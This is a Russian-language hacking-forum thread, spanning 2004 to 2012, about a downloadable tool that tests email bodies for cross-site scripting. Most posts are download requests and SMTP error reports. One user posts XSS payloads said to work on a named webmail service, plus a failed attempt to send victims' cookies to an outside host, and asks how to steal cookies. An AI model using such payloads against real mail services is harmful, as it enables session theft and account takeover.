Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   XSS mail Tester (https://forum.antichat.xyz/showthread.php?t=3332)

LittleLamer 29.11.2004 02:11

XSS mail Tester
 
Зацени плиз мой XSS Tester:
http://sec-123.narod.ru/xss/XSSTest1_0.rar

Тестирует тело письма на известные ХСС.

Егорыч+++ 30.11.2004 00:11

Прикольно ничего не скажешь... Можно и у нас выложить если ты не против...

Algol 30.11.2004 00:31

Проблема в том, что это будет работать только в том, случае, когда система пропускает теги, а этого практически никогда не бывает
Это все нужно оформлять не через Html теги а через Bb теги например (для форумов)

Да и еще OnERor пишется с двумя R

LittleLamer 30.11.2004 16:22

Ну это пока тестовая версия, и она только для email-ов.
А за OnERor псб - торопился :)
На счёт выложить - попозже наверно, счас программа сыровата.

virgoz 30.11.2004 20:48

интересная идея :)
сделаю себе такой...

LittleLamer 30.11.2004 23:02

Изменил немного:
http://xsstest.narod.ru/XSSTest1_0.rar

madnet 14.12.2004 23:31

Я пишу такой же, но для форумов с работай чарес прокси серверы и т.д, но не хватает информации - одному сложно искать, если у кого есть подборочки с багами и подробным описанием, скинь те плиз на dead-3000@tut.by - буду очень признателен.

LittleLamer 14.12.2004 23:47

Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное.
P.s.: хотя я могу ошибаться ;)

madnet 15.12.2004 01:06

Не понял тебя?

Algol 17.12.2004 14:01

Цитата:

Сообщение от LittleLamer
Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное.
P.s.: хотя я могу ошибаться ;)

Да, нужно что бы система тестировала прохождение кавычек, тегов, ключевых слов типа javascript в разных случаях, в разных тегах и т.д.

Егорыч+++ 17.12.2004 16:04

Да я кстати думаю что лучше такую систему вообще полностью онлайн сделать

SHiTS 17.12.2004 16:43

в образовательных целях так сказать,чтоб такие юзвери как я могли трениться.
ток я пока в это тесте ниче не понимаю.ключевое слово "пока".

nc.STRIEM 18.07.2006 00:04

где сейчас можно скачать XSSTest так как приведенные выше ссылки уже не работают??

Dronga 18.07.2006 00:38

Смотри Faq к разделу.

MeXoN 10.02.2007 04:43

Сылки работают. Зделай проще скопируй сылку и вствь в адресную строку своего браузера.

ya_mag 15.02.2007 17:37

Прога супер!!! огромное спасибо!
вот только помагите правильно составить запрос... у меня что то нифига не получается :(
вобщем вот эта xss
<body onLoad=alert(2)>
и вот эта
<meta http-equiv=Refresh content=0;url=javascript:alert(4)>
работают на mail.gala.net
но никак не могу добится что бы мне пришли куки :( я делал вот так:
<body onLoad="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie>
вобщем объясните как эту xss юзать?

Phen1x 20.02.2007 07:29

Так так, а как им пользоваться? :)

ya_mag 20.02.2007 09:22

всё очень просто:) отправляеш письмо на свой ящик который хочеш проверить... и смотриш результаты:)

Miixxa 20.07.2007 19:17

Приветсвтую!
Вот решил испробовать XSS тестер.
При завершении пишет постоянно:

Error in command: must be 250, but returned -->>
recived:
˜øš
sended:
QUIT

Error in command: must be 221, but returned -->>
recived:
˜øš
Socket closed
-------ERROR------
SMTP`session ENDed with ERROR : message not sended!!!
-----END_ERROR-----

Вот значит, вроде бы правильно все ввожу:
в строке
от: 66-66-66@mail.ru
кому: mpetrovsky@mail.ru
сервер: smtp.mail.ru
порт: 25
авторизация: USER: 66-66-66 PASSWORD: *********

запускаю, результат выше был описан.
что не так?

Tesson 04.04.2011 03:13

Линки не рабочие дайте рабочий

Sann4oss 08.04.2011 04:10

Выложите еще раз

Amoura 08.04.2011 11:18

Цитата:

Сообщение от Sann4oss
Sann4oss said:
Выложите еще раз

__http://depositfiles.com/files/s56ov97ja

SASA_2012 31.03.2012 21:29

Ошибка

Постоянно выскакивает ошибка.Как ей пользоваться???

Duskly 16.09.2012 17:28

Чего у меня пишет постоянно:

Begin SMTP`session

Error in connect (SOCKET)

tipahead 16.09.2012 17:30

Много пыли в коде

Duskly 16.09.2012 17:31

а она работает еще?

tipahead 16.09.2012 17:32

если смазать

Duskly 16.09.2012 17:36

как смазать?) всмысле?

Russian Cat 04.10.2012 21:48

Нормал

Succous 04.10.2012 21:52

Цитата:

Сообщение от Duskly
Duskly said:
как смазать?) всмысле?

Отредактировать.

Duskly 04.10.2012 22:46

а как редактировать то? что именно?

Vip77 22.10.2012 23:29

8 лет прошло, а тема все еще апается

BigBear 23.10.2012 09:33

Закрыто за неактуальностью.


Время: 20:36